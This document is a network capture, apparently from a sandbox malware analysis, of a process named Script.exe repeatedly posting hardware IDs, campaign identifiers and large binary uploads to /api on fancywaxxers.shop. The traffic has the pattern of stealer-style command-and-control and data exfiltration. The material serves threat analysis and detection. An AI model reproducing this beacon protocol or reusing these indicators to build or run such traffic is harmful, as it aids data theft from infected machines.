2025-01-05 18:08:59 UTC	284	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=E1QIVYDQY8BRGUDGLTC User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12846 Host: fancywaxxers.shop
2025-01-05 18:08:59 UTC	12846	OUT	Data Raw: 2d 2d 45 31 51 49 56 59 44 51 59 38 42 52 47 55 44 47 4c 54 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 36 33 45 45 38 39 46 39 41 30 33 41 33 36 33 33 36 34 32 44 41 36 30 38 39 35 36 46 46 31 0d 0a 2d 2d 45 31 51 49 56 59 44 51 59 38 42 52 47 55 44 47 4c 54 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 45 31 51 49 56 59 44 51 59 38 42 52 47 55 44 47 4c 54 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 33 Data Ascii: --E1QIVYDQY8BRGUDGLTCContent-Disposition: form-data; name="hwid"2C63EE89F9A03A3633642DA608956FF1--E1QIVYDQY8BRGUDGLTCContent-Disposition: form-data; name="pid"2--E1QIVYDQY8BRGUDGLTCContent-Disposition: form-data; name="lid"yau6Na--63
2025-01-05 18:08:59 UTC	1132	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:08:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cf76aodposqpah85a6rn48prfi; expires=Thu, 01 May 2025 11:55:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1FUUQDa8BI6UPlme3Z1%2FKpPjCj1WhDN6NNOEh2nyk4lKRP3Yhv4sI6cQCDlxqrxO2BTcKiBvzLWxVEOZORQ0eOEXeGp%2FOryRpW1tQ63VEBSaYLTTDKVHviICPg5r0CG8Ey%2F3bQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd56ab3095b8c0f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1986&min_rtt=1978&rtt_var=759&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2843&recv_bytes=13788&delivery_rate=1425085&cwnd=223&unsent_bytes=0&cid=acfd0cbd62a6f3ee&ts=577&x=0"
2025-01-05 18:08:59 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:08:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49720	104.21.80.1	443	1480	C:\Users\user\Desktop\Script.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:09:00 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=D9L41FOWJU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15034 Host: fancywaxxers.shop
2025-01-05 18:09:00 UTC	15034	OUT	Data Raw: 2d 2d 44 39 4c 34 31 46 4f 57 4a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 36 33 45 45 38 39 46 39 41 30 33 41 33 36 33 33 36 34 32 44 41 36 30 38 39 35 36 46 46 31 0d 0a 2d 2d 44 39 4c 34 31 46 4f 57 4a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 39 4c 34 31 46 4f 57 4a 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 33 33 31 38 30 31 32 39 38 0d 0a 2d 2d 44 39 4c 34 31 46 4f 57 4a 55 0d 0a 43 6f 6e Data Ascii: --D9L41FOWJUContent-Disposition: form-data; name="hwid"2C63EE89F9A03A3633642DA608956FF1--D9L41FOWJUContent-Disposition: form-data; name="pid"2--D9L41FOWJUContent-Disposition: form-data; name="lid"yau6Na--6331801298--D9L41FOWJUCon
2025-01-05 18:09:00 UTC	1144	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:09:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=sl30io00uc0a27k334cgmcbbnp; expires=Thu, 01 May 2025 11:55:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n5sp%2FmREwve1nQsKPsQb43B8MPpLESkThL3%2B7%2BAAHog3dPrayww6aPPbviz151%2FLnVgDdgiCr3KGuLBw9%2BCtOGjx93aCjS4pO%2B0esewi%2FVOn%2F3hBO8i50dPx%2BLKBN1W8Z3X9mg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd56ab9bba8c443-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1644&rtt_var=626&sent=8&recv=19&lost=0&retrans=0&sent_bytes=2843&recv_bytes=15967&delivery_rate=1732937&cwnd=244&unsent_bytes=0&cid=9efe5afe28632129&ts=522&x=0"
2025-01-05 18:09:00 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:09:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49721	104.21.80.1	443	1480	C:\Users\user\Desktop\Script.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:09:01 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=0YTF4JD3OGNZFOCA User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20560 Host: fancywaxxers.shop
2025-01-05 18:09:01 UTC	15331	OUT	Data Raw: 2d 2d 30 59 54 46 34 4a 44 33 4f 47 4e 5a 46 4f 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 36 33 45 45 38 39 46 39 41 30 33 41 33 36 33 33 36 34 32 44 41 36 30 38 39 35 36 46 46 31 0d 0a 2d 2d 30 59 54 46 34 4a 44 33 4f 47 4e 5a 46 4f 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 59 54 46 34 4a 44 33 4f 47 4e 5a 46 4f 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 33 33 31 38 30 31 32 39 38 0d Data Ascii: --0YTF4JD3OGNZFOCAContent-Disposition: form-data; name="hwid"2C63EE89F9A03A3633642DA608956FF1--0YTF4JD3OGNZFOCAContent-Disposition: form-data; name="pid"3--0YTF4JD3OGNZFOCAContent-Disposition: form-data; name="lid"yau6Na--6331801298
2025-01-05 18:09:01 UTC	5229	OUT	Data Raw: 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 Data Ascii: vMMZh'F3Wun 4F([:7s~X`nO`
2025-01-05 18:09:03 UTC	1134	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:09:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=tk2mlpjn1ged5os8h7ahlj8v29; expires=Thu, 01 May 2025 11:55:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KJM2%2F0jv7M6F4Vu1cmqoOwCZkAVQyGD%2Fd9v4Vg80mny3nZK4kXoJVQmvMHaXwfi0GprqDjp6yca6gLy%2BWfJs0iADeTF93keD0uMe8NFeKTEWSsBDWqjiTzLvR3cmgM2WssrB3g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd56ac06b337d0e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1983&rtt_var=768&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2843&recv_bytes=21521&delivery_rate=1402497&cwnd=244&unsent_bytes=0&cid=ab44ca6668aa5d91&ts=1639&x=0"
2025-01-05 18:09:03 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:09:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49722	104.21.80.1	443	1480	C:\Users\user\Desktop\Script.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:09:03 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=857CJA9RMRQ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1222 Host: fancywaxxers.shop
2025-01-05 18:09:03 UTC	1222	OUT	Data Raw: 2d 2d 38 35 37 43 4a 41 39 52 4d 52 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 36 33 45 45 38 39 46 39 41 30 33 41 33 36 33 33 36 34 32 44 41 36 30 38 39 35 36 46 46 31 0d 0a 2d 2d 38 35 37 43 4a 41 39 52 4d 52 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 35 37 43 4a 41 39 52 4d 52 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 33 33 31 38 30 31 32 39 38 0d 0a 2d 2d 38 35 37 43 4a 41 39 52 4d 52 51 0d Data Ascii: --857CJA9RMRQContent-Disposition: form-data; name="hwid"2C63EE89F9A03A3633642DA608956FF1--857CJA9RMRQContent-Disposition: form-data; name="pid"1--857CJA9RMRQContent-Disposition: form-data; name="lid"yau6Na--6331801298--857CJA9RMRQ
2025-01-05 18:09:04 UTC	1134	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:09:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dkmrjl3h5gur8kqajrlteese5t; expires=Thu, 01 May 2025 11:55:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xW3TWyuex4qHscY6VbZLO2aTHiQQTL3Sm%2FrSCHjCxXWy5Ot4sU6d4VH7R0iN%2BHTCJvvh%2FWj%2Fn7SKssQ%2BbNWJok9V0n9n7SWLU4Ua6L4NvKZMhqGLiKvAjDXSs9v5B4VezAo30w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd56ace0cf242d2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1574&rtt_var=611&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2133&delivery_rate=1761158&cwnd=229&unsent_bytes=0&cid=e37a4ecb4e0bb2df&ts=486&x=0"
2025-01-05 18:09:04 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:09:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49723	104.21.80.1	443	1480	C:\Users\user\Desktop\Script.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:09:05 UTC	285	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6VMVRVQYONVT1LLEUWL User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 568902 Host: fancywaxxers.shop
2025-01-05 18:09:05 UTC	15331	OUT	Data Raw: 2d 2d 36 56 4d 56 52 56 51 59 4f 4e 56 54 31 4c 4c 45 55 57 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 43 36 33 45 45 38 39 46 39 41 30 33 41 33 36 33 33 36 34 32 44 41 36 30 38 39 35 36 46 46 31 0d 0a 2d 2d 36 56 4d 56 52 56 51 59 4f 4e 56 54 31 4c 4c 45 55 57 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 36 56 4d 56 52 56 51 59 4f 4e 56 54 31 4c 4c 45 55 57 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 36 33 Data Ascii: --6VMVRVQYONVT1LLEUWLContent-Disposition: form-data; name="hwid"2C63EE89F9A03A3633642DA608956FF1--6VMVRVQYONVT1LLEUWLContent-Disposition: form-data; name="pid"1--6VMVRVQYONVT1LLEUWLContent-Disposition: form-data; name="lid"yau6Na--63
2025-01-05 18:09:05 UTC	15331	OUT	Data Raw: 01 65 a1 59 3c fa 35 99 7f a9 e4 4e 89 43 5d 58 cd f3 8a fb 6b 9e 10 c8 fe 1b 45 42 73 51 3b 0b e8 b0 3a a5 c5 cb 9b f4 fd a0 7a ea db ff bf 77 1c 79 39 00 64 97 35 7f ed 27 72 c1 27 2d fc 32 0d 68 1a 46 3d b1 a0 93 64 32 ac b4 b9 f0 65 38 0a 50 3f 59 67 7c 51 24 af d0 d3 d5 ee 20 99 93 b4 a0 3b 06 bc 6f eb cc d3 42 c1 4a 75 3b ee 26 4a f8 c3 66 55 14 39 5d 1b 10 7e 88 eb e6 42 9b df 78 a4 87 5e f8 27 94 26 97 a3 c1 a8 de 44 0b d5 a9 19 fe f3 39 a3 68 33 ab 45 17 b5 be cf 83 e6 8b be 67 4f 47 91 d2 b6 b2 e9 83 a2 ed 97 44 ca 77 7d 37 14 c6 e2 fd 86 85 83 8d 98 a7 7a fc 7b 5c 93 b1 f1 86 77 ef 82 70 10 29 01 ae 77 b5 e4 e4 77 a0 7b 9e c2 bd 82 53 47 c1 2b 37 61 da ca 18 95 fb d4 70 e2 dd 12 8d 1f 48 2b 08 79 d6 ba 6f 28 b0 4c 82 43 1e 04 06 24 47 c7 e9 dd Data Ascii: eY<5NC]XkEBsQ;:zwy9d5'r'-2hF=d2e8P?Yg\|Q$ ;oBJu;&JfU9]~Bx^'&D9h3EgOGDw}7z{\wp)ww{SG+7apH+yo(LC$G
2025-01-05 18:09:05 UTC	15331	OUT	Data Raw: f4 96 02 a4 c5 ad fe 1a cb 8a 75 35 c7 cb 93 48 8e ab 7a 9f 7a 3d f8 7d f0 ed 46 19 cf d1 3f e9 c3 d5 57 9f 8f f4 09 ce da 7e b1 63 5d 10 61 aa d8 cc 87 d5 6c 62 75 66 e6 fe f1 5c 7a 78 9e cb 1d 2a 01 cc d7 69 55 62 a0 7a 87 1f d0 c6 24 49 4e d9 ce 4e d2 60 c7 f9 ff 11 37 7e f0 46 15 2c 1a 82 c5 8a 80 cb c8 94 23 00 f7 2b 98 6f ff e7 cc 4e 5d 46 7d cb 45 5b 21 f1 21 8d a2 8a 50 04 9a 08 8a c7 05 58 39 3b 39 4e 38 0f 87 eb 31 da 46 bd c6 b2 d8 11 02 ea 91 5e fc 20 f8 84 64 86 ca c6 91 bf 7d 53 4a 9e b5 52 22 71 05 28 92 e3 a4 cd a7 97 4d 57 bd d9 b6 33 0a 20 e3 49 54 01 94 e2 e6 8b 38 d1 56 0b 4a 0a ef 91 35 ae e9 82 da 8d ba bd 97 5c 09 d3 e8 84 1f 2b 52 4b 75 bc 10 e1 91 b1 cd b6 c8 23 b4 e4 ef a6 b9 59 6a 97 7e 5e 5c 91 b7 a7 c2 c1 98 a0 9a 01 7b 92 3e Data Ascii: u5Hzz=}F?W~c]albuf\zx*iUbz$INN`7~F,#+oN]F}E[!!PX9;9N81F^ d}SJR"q(MW3 IT8VJ5\+RKu#Yj~^\{>
2025-01-05 18:09:05 UTC	15331	OUT	Data Raw: cd 5e 88 46 24 fe 5d f6 54 0a 25 6c c6 9d 2c 82 f2 31 97 13 6d 25 ca ce d5 0b 82 52 04 e2 11 ae e6 87 3a c8 c1 17 0e 7e 48 4c c7 e5 f1 4d ab 83 59 dd 99 27 15 d7 51 a0 44 23 f2 df ea ca 77 2a 25 48 a0 22 00 f8 a0 80 1d dc 4e 14 f6 be 15 f5 91 07 df fd bd 07 03 9e be bd 39 ac f5 7d 62 e8 b6 02 7c c7 f2 e4 31 55 30 bb 35 ba 1c 7e a7 66 f5 ca df 65 ce 3e a8 e6 2c 47 bd 36 fe 2c cc 48 01 70 91 b4 77 d8 8d cb 35 e7 bc 37 a0 ce 27 6d 6c 65 e9 38 50 ed 7e c0 fb eb 9d 67 2e d8 f8 da 44 3d 30 d3 06 22 8b 45 b4 38 de bb 98 f5 ba 14 3c 94 a9 07 45 a0 c0 df dc 06 40 ec fd 8a f3 c6 4a 6c bb bd fc 79 2b e0 98 8a f9 c4 f2 98 20 11 10 a8 35 c9 ca 56 d0 df 9d 99 27 74 49 19 e1 26 e1 35 bd 43 d2 82 1f 69 ea bc 4b df e4 c9 7a f4 8e c6 28 17 f0 b0 43 e3 72 6b cc 62 4c 9e c1 Data Ascii: ^F$]T%l,1m%R:~HLMY'QD#w*%H"N9}b\|1U05~fe>,G6,Hpw57'mle8P~g.D=0"E8<E@Jly+ 5V'tI&5CiKz(CrkbL
2025-01-05 18:09:05 UTC	15331	OUT	Data Raw: cc 1d db 06 c4 7f b3 32 8d 8a fb 92 7c 99 87 85 5b 65 c2 b8 bd a2 d7 ac 33 7b 51 a4 18 a1 d4 ce 7b ae 07 f7 1a df 59 8a 3c 00 3e 0a 51 6f 7b ed f4 df ae 5d 32 eb 45 c3 e8 cd a3 8c 56 ff 67 5b 64 54 94 df e6 b5 df 05 f1 82 be 1d 92 b1 0d 8b 09 3c f8 52 14 ea 0c 49 8a 8c 5d fc be 86 5e 8c de a7 51 8b cf c4 39 84 c3 30 7c d7 9b 17 31 c0 ea be e6 a1 d0 80 5c 7d 59 9c f0 dd 11 18 99 18 35 46 68 6f 7b b8 21 c4 76 9e e5 67 4a 7c fc ce 72 a3 d8 89 72 63 e6 f0 d4 11 37 2e 14 e1 60 80 ee c9 c4 0d 29 f0 ce a5 d0 eb 34 d1 11 c3 7b f7 79 a8 cc ca af 2d 72 aa 8c 39 68 8e d1 a0 2f 7f df 32 db 9b a9 b7 61 52 e4 c4 13 ad 84 69 2a 66 0a 0f 1f b8 e3 54 9b ce 13 56 9a 95 fc e1 3b 29 6c 18 69 6a 8d 78 51 68 99 46 e1 e7 04 de ed 28 db b9 1e fb 0c 6e 5f db e0 f6 65 12 b6 e3 7f Data Ascii: 2\|[e3{Q{Y<>Qo{]2EVg[dT<RI]^Q90\|1\}Y5Fho{!vgJ\|rrc7.`)4{y-r9h/2aRi*fTV;)lijxQhF(n_e
2025-01-05 18:09:05 UTC	15331	OUT	Data Raw: dd 9c c5 5c cd 2e ea 75 6e 81 63 73 43 38 0d 09 3a de c2 93 b8 4e 03 18 f1 dd 2a 8c 6a c9 47 0a 69 7b 04 f8 de 45 f6 cc 7f fe 57 a4 d1 c4 09 d7 58 d6 4b f0 16 38 e4 cd ee 32 75 4a 95 7a b4 86 a4 b5 ff b5 cd 7d 0f ae 62 db 6d c6 14 5a 86 48 0c 27 5c 04 97 87 92 50 1f 88 e7 ed c7 b3 34 f0 d0 74 dc 08 c2 e5 a2 b9 ae 91 29 eb 5a e7 18 16 10 30 40 13 03 79 8a 1b d3 12 2a 80 b0 36 f8 b3 6f 5b 28 d3 89 3e 9f cc a8 31 06 6c fb f2 b9 e3 28 46 bb a1 14 d3 ac 0a 98 80 5a 43 1c ec 9a d1 0c e6 b3 f1 b4 8a 76 13 53 e2 69 b0 3e f0 d8 f7 d1 2a 48 6d 23 57 6e 84 4c 01 7b 30 e1 a1 20 06 34 2f 9b 51 76 c3 26 a0 5e 7a f9 80 2f 59 fc c0 9c fe 34 43 e9 90 34 12 d6 b9 23 11 5f 2c 23 e1 85 85 9d bd 1e d2 bb 11 83 fa 0a 07 12 69 38 e6 57 11 a0 81 41 6a d3 10 0e 7e 38 27 28 03 a6 Data Ascii: \.uncsC8:NjGi{EWXK82uJz}bmZH'\P4t)Z0@y6o[(>1l(FZCvSi>*Hm#WnL{0 4/Qv&^z/Y4C4#_,#i8WAj~8'(
2025-01-05 18:09:05 UTC	15331	OUT	Data Raw: e2 de 50 83 f7 54 49 06 27 af 3d 08 77 59 40 3b 1a c7 50 41 90 1b b5 13 45 9c ad 78 d2 c2 07 76 d4 aa 8c 9e e8 52 2a 4e 5a 30 e7 e7 4c 0b 52 1c 16 63 f6 fd 17 14 42 ca 1c fa 3b 28 02 02 2d 6f 23 30 61 98 18 e7 b2 d2 f6 ca d5 33 2d 67 09 92 7b 11 c5 c5 ba 74 3c a9 f1 2f 76 74 3a 94 76 89 8b 5d 47 14 c2 74 4b bb 0b 44 79 17 cd 07 72 be b4 d7 ca d6 2d dd a8 79 c2 5b 5f d8 29 03 01 45 e3 b0 8e c3 02 79 b2 a0 7e c4 24 0b 59 8a 29 bc cf 46 e3 bf b9 86 ec ab 5b ef 4d ff e4 ac 0d af 9d 8b d2 ab e7 b9 0d ca c3 7e a6 9c 2f f9 21 7d 85 32 eb 5b 63 eb e7 78 d9 db 40 1a 85 7e 96 91 85 62 94 1c 3b 01 3c 63 14 5d 62 d6 e7 d4 87 e9 55 64 c3 ed 0c d6 15 f9 ad c7 91 ff f3 2e f5 6c aa 44 bb 0f c4 d4 61 6b ca 1c ee 41 31 3e be 8c b7 11 62 03 95 ed 2e 5e 81 6b cf 66 e9 9c eb Data Ascii: PTI'=wY@;PAExvR*NZ0LRcB;(-o#0a3-g{t</vt:v]GtKDyr-y[_)Ey~$Y)F[M~/!}2[cx@~b;<c]bUd.lDakA1>b.^kf
2025-01-05 18:09:05 UTC	15331	OUT	Data Raw: 92 c0 2e a0 da 14 8e 05 cd 1e 82 ac 29 0c 90 3c 93 19 f6 ec 61 ea 49 f5 ba 93 f3 34 0b 38 60 94 24 a1 94 73 fb 8a fd 1b d2 47 aa 03 44 1d f8 2a 46 dc d1 14 b1 5e 9a 09 e1 c7 48 10 39 b9 97 50 90 4c 55 e3 32 0d a9 6a 68 95 0a ec 7a 44 16 56 fa 1c e1 40 54 2b 1c 6d 26 19 83 5f 94 bb 9d ef db df 86 3b 9e 9f 57 42 6b c7 3f b6 3d a2 10 ad 9b e7 99 aa 99 da 8e 64 4b 49 60 c4 69 0c e2 b3 1c da 08 c2 f8 66 57 a2 6d b5 d0 df 57 d2 a2 c3 af 28 8c 6d 5c 38 d4 53 c1 23 94 0c ca 0b 3e 47 a7 a2 b8 68 66 8c f4 c2 ef 4c 2a 16 8e 8d c5 84 4c 4e 7e 2d fb 96 48 a9 b1 c4 91 db f9 71 5a d2 c1 96 b9 fb a5 59 29 5b 37 c7 c2 2a 00 2f 45 06 e4 fe c8 9d 30 d5 22 06 9a 07 3c 69 f6 6f d9 76 3d 4a 67 39 46 cb d4 e9 a3 89 62 94 82 73 78 b9 a0 79 3f 7c bb 12 2b 01 26 d7 50 3b 6e bf 0d Data Ascii: .)<aI48`$sGDF^H9PLU2jhzDV@T+m&_;WBk?=dKI`ifWmW(m\8S#>GhfLLN~-HqZY)[7*/E0"<iov=Jg9Fbsxy?\|+&P;n
